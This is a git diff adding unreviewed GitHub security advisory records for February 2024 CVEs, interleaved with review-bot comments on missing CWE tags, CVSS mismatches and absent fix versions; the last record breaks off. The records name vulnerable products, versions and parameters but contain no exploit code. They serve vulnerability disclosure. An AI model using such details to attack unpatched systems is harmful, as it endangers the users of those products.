@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m5gq-732f-j9v6", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-25189" + ], + "details": "libjwt 1.15.3 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25189" + }, + { + "type": "WEB", + "url": "https://github.com/P3ngu1nW/CVE_Request/blob/main/benmcollins%3Alibjwt.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json b/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json new file mode 100644 index 0000000000000..01431c7dad83a --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m6p7-jxxh-vc8c/GHSA-m6p7-jxxh-vc8c.json 
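Review bot: `cwe_ids` is empty although the description names the weakness exactly: a non-constant-time `strcmp` on an authentication comparison is CWE-208 (observable timing discrepancy), and `"cwe_ids": ["CWE-208"]` would make this record filterable like its neighbours. The sole non-NVD reference is a personal CVE-request write-up; the path segment `benmcollins%3Alibjwt` suggests the upstream project, but no upstream fix commit or release is cited, so the 1.15.3 bound cannot be checked from this record. The phrase "to verify authentication" is also imprecise — presumably the signature comparison during JWT verification — so a curator should confirm the affected code path against upstream before relying on it.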
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m6p7-jxxh-vc8c", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20812" + ], + "details": "Out-of-bounds Write in padmd_vld_htbl of libpadm.so prior to SMR Feb-2024 Release 1 allows local attacker to execute arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20812" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json b/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json new file mode 100644 index 0000000000000..b066a44039f55 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-m8v6-ghjm-p88m/GHSA-m8v6-ghjm-p88m.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8v6-ghjm-p88m", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T18:30:30Z", + "aliases": [ + "CVE-2023-32967" + ], + "details": "An incorrect authorization vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to bypass intended access restrictions via a network.\nQTS 5.x, QuTS hero are not affected.\n\nWe have already fixed the vulnerability in the following versions:\nQuTScloud c5.1.5.2651 and later\nQTS 4.5.4.2627 build 20231225 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32967" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285", + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json b/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json new file mode 100644 index 0000000000000..13cefa65dcd4f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mc3m-gj6r-2fhp/GHSA-mc3m-gj6r-2fhp.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mc3m-gj6r-2fhp", + "modified": "2024-02-08T21:30:38Z", + "published": "2024-02-08T21:30:38Z", + "aliases": [ + "CVE-2024-0242" + ], + "details": "Under certain circumstances IQ Panel4 and IQ4 Hub panel software prior to version 4.4.2 could allow unauthorized access to settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0242" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01" + }, + { + "type": "WEB", + "url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T20:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json b/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json new file mode 100644 index 0000000000000..7abe51fec69cf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mch6-54rg-c2wq/GHSA-mch6-54rg-c2wq.json 
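Review bot: The CWE and the CVSS vector contradict each other: `cwe_ids` carries `CWE-200` (information exposure) while the vector is `C:N/I:H/A:H`, i.e. no confidentiality impact, and the description speaks of unauthorized access to settings, which is an authorization problem. `CWE-285` or `CWE-284` would match the text and line up with the other access-control entries in this batch (CVE-2024-24936 and CVE-2023-32967 both use CWE-285). The values presumably mirror the NVD/CISA record, so this is a note for curation rather than a local edit, but as it stands the weakness tag will mislead anyone triaging by CWE.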
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mch6-54rg-c2wq",
+ "modified": "2024-02-07T03:30:33Z",
+ "published": "2024-02-07T03:30:33Z",
+ "aliases": [
+ "CVE-2024-1269"
+ ],
+ "details": "A vulnerability has been found in SourceCodester Product Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /supplier.php. The manipulation of the argument supplier_name/supplier_contact leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253012.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1269"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PrecursorYork/Product-Management-System-Using-PHP-and-MySQL-Reflected-XSS-POC/blob/main/README.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.253012"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.253012"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T02:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json b/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json
new file mode 100644
index 0000000000000..3c9b9b25b95bf
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mcx4-2h94-vmqp",
+ "modified": "2024-02-06T06:30:31Z",
+ "published": "2024-02-06T06:30:31Z",
+ "aliases": [
+ "CVE-2023-33069"
+ ],
+ "details": "Memory corruption in Audio while processing the calibration data returned from ACDB loader.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33069"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T06:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json b/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json
new file mode 100644
index 0000000000000..e1684d4388c20
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mf92-wvmg-38g9",
+ "modified": "2024-02-05T18:31:37Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2023-47355"
+ ],
+ "details": "The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47355"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/actuator/com.eypcnnapps.quickreboot/blob/main/CWE-925.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://play.google.com/store/apps/details?id=com.eypcnnapps.quickreboot"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T16:15:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json b/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json
new file mode 100644
index 0000000000000..8dde54626b6aa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json
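Review bot: `cwe_ids` is left empty although the actuator reference is literally a file named `CWE-925.md` and the details describe exported broadcast receivers accepting unauthorized broadcasts, which is what CWE-925 covers; `"cwe_ids": ["CWE-925"]` would be grounded in the record's own references. The top-level `severity` is also empty, so `database_specific.severity` is `null` and downstream tooling cannot rank this at all; if no NVD score arrives, a one-line impact note (any co-installed app can power off, reboot or boot the device to recovery) would help triage. Only version `1.0.8` is named as affected and no fixed version is given.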
@@ -0,0 +1,39 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mf94-378q-xvc3",
+ "modified": "2024-02-06T03:32:59Z",
+ "published": "2024-02-06T03:32:59Z",
+ "aliases": [
+ "CVE-2023-47022"
+ ],
+ "details": "An issue in NCR Terminal Handler v.1.5.1 allows a remote attacker to execute arbitrary code via a crafted script to the payload parameter.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47022"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.google.com/document/d/15s7NftTX2dxfcFnMqkFIyeN48xq3LceesWOhP-9xL4Y/edit?usp=sharing"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47022"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json b/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json
new file mode 100644
index 0000000000000..66be65c1d5fc8
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json
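Review bot: The details are ambiguous about the vulnerability class: "execute arbitrary code via a crafted script to the payload parameter" reads as either stored XSS or server-side code execution, and with `severity` and `cwe_ids` both empty nothing in the record disambiguates it. One of the two references is a Google Docs share link (`docs.google.com/document/d/...?usp=sharing`), which its owner can edit or withdraw at any time; the Patrick0x41 GitHub advisory is the more durable source and should be the one consumers are pointed at. Until the class is confirmed from that write-up, the record should not be read as a remote code execution in NCR Terminal Handler 1.5.1.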
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mfph-26j7-jm24",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-0244"
+ ],
+ "details": "Buffer overflow in CPCA PCFAX number process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS MF750C Series/Color imageCLASS X MF1333C firmware v03.07 and earlier sold in US. i-SENSYS MF754Cdw/C1333iF firmware v03.07 and earlier sold in Europe.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0244"
+ },
+ {
+ "type": "WEB",
+ "url": "https://canon.jp/support/support-info/240205vulnerability-response"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.canon/advisory-information/cp2024-001/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.canon-europe.com/support/product-security-latest-news/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json b/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json
new file mode 100644
index 0000000000000..9933a6c75cc96
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json
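Review bot: The details name only the vulnerable firmware ("v03.07 and earlier") for each region and never the firmware that fixes it, so a reader of this record alone cannot tell which update closes the hole; the vendor PSIRT page `cp2024-001` is presumably where that lives, and a one-line "fixed in" would save every consumer a lookup. Note also that the text says "an attacker on the network segment" while the vector is `AV:N`; for fleet prioritisation the difference between adjacent-network and internet-reachable matters, and the vector is the stricter reading. The trailing `\n\n` in the details string is feed artefact and could be trimmed.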
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mfxx-xjx2-rcm9",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2024-1037"
+ ],
+ "details": "The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1037"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T07:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json b/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json
new file mode 100644
index 0000000000000..a6be019d47fdb
--- /dev/null
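Review bot: `cwe_ids` is empty even though the details state this is Reflected Cross-Site Scripting via the `tab` parameter; `"cwe_ids": ["CWE-79"]` is what both the description and the `S:C/C:L/I:L` vector support. The fixed version is only recoverable from the changeset URL path (`tags/5.2.6`), not from the details, so a reader has to parse a reference to learn that 5.2.6 closes it. The two `wp-security-list-404.php#L32` / `#L50` links point into `trunk`, which drifts as the plugin changes; the changeset link is the stable one.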
+++ b/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mgqx-9848-6j3q",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-1075"
+ ],
+ "details": "The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1075"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json b/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json
new file mode 100644
index 0000000000000..059b8ddb52bfa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mgrh-9mx5-cjmf",
+ "modified": "2024-02-06T00:30:27Z",
+ "published": "2024-02-06T00:30:27Z",
+ "aliases": [
+ "CVE-2024-0691"
+ ],
+ "details": "The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0691"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3023924/filebird"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T22:16:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json b/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json
new file mode 100644
index 0000000000000..9ba45c2fcac9c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json
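Review bot: `cwe_ids` is empty for what the details call Stored Cross-Site Scripting via imported folder titles; `"cwe_ids": ["CWE-79"]` is supported directly by the text. The attacker needs administrator access (`PR:H`), and on a single-site WordPress install an administrator typically already holds `unfiltered_html`, so the practical risk is mostly the social-engineering path the details mention (getting an admin to import a crafted folder file) — a caveat worth recording so this is not triaged as a privilege escalation. No fixed version is named in the details; changeset `3023924` is the only hint.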
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mh9r-mh3m-pcgq",
+ "modified": "2024-02-02T00:31:26Z",
+ "published": "2024-02-02T00:31:26Z",
+ "aliases": [
+ "CVE-2023-46706"
+ ],
+ "details": "\n\n\nMultiple MachineSense devices have credentials unable to be changed by the user or administrator.\n\n\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46706"
+ },
+ {
+ "type": "WEB",
+ "url": "https://machinesense.com/pages/about-machinesense"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-798"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T23:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json b/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json
new file mode 100644
index 0000000000000..4cf56973b7529
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json
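Review bot: The `details` string carries three leading and four trailing `\n` characters around a single sentence, which is artefact from the source feed rather than content and renders as blank padding in every consumer; trimming it to `"Multiple MachineSense devices have credentials unable to be changed by the user or administrator."` loses nothing. That one sentence also never names which devices or firmware are affected, so the CISA ICSA-24-025-01 reference is the only place that can come from; a `CRITICAL` hard-coded-credential finding (`CWE-798`, `PR:N`) with no product list is hard to act on.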
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mhh5-gvh7-h426",
+ "modified": "2024-02-04T06:30:20Z",
+ "published": "2024-02-04T06:30:20Z",
+ "aliases": [
+ "CVE-2019-25159"
+ ],
+ "details": "A vulnerability was found in mpedraza2020 Intranet del Monterroso up to 4.50.0. It has been classified as critical. This affects an unknown part of the file config/cargos.php. The manipulation of the argument dni_profe leads to sql injection. Upgrading to version 4.51.0 is able to address this issue. The identifier of the patch is 678190bee1dfd64b54a2b0e88abfd009e78adce8. It is recommended to upgrade the affected component. The identifier VDB-252717 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25159"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mpedraza2020/IESMONTEROSOINTRANET/commit/678190bee1dfd64b54a2b0e88abfd009e78adce8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mpedraza2020/IESMONTEROSOINTRANET/releases/tag/v4.51.0"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252717"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252717"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-04T06:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json b/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json
new file mode 100644
index 0000000000000..f1f8b95d230f5
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mhj8-r2ff-pfwm",
+ "modified": "2024-02-01T12:30:23Z",
+ "published": "2024-02-01T12:30:23Z",
+ "aliases": [
+ "CVE-2023-51690"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Advanced iFrame allows Stored XSS.This issue affects Advanced iFrame: from n/a through 2023.8.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51690"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-8-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T11:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json b/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json
new file mode 100644
index 0000000000000..ea125a6972147
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mhqq-cwfh-qr59",
+ "modified": "2024-02-02T18:30:31Z",
+ "published": "2024-02-02T18:30:31Z",
+ "aliases": [
+ "CVE-2023-41277"
+ ],
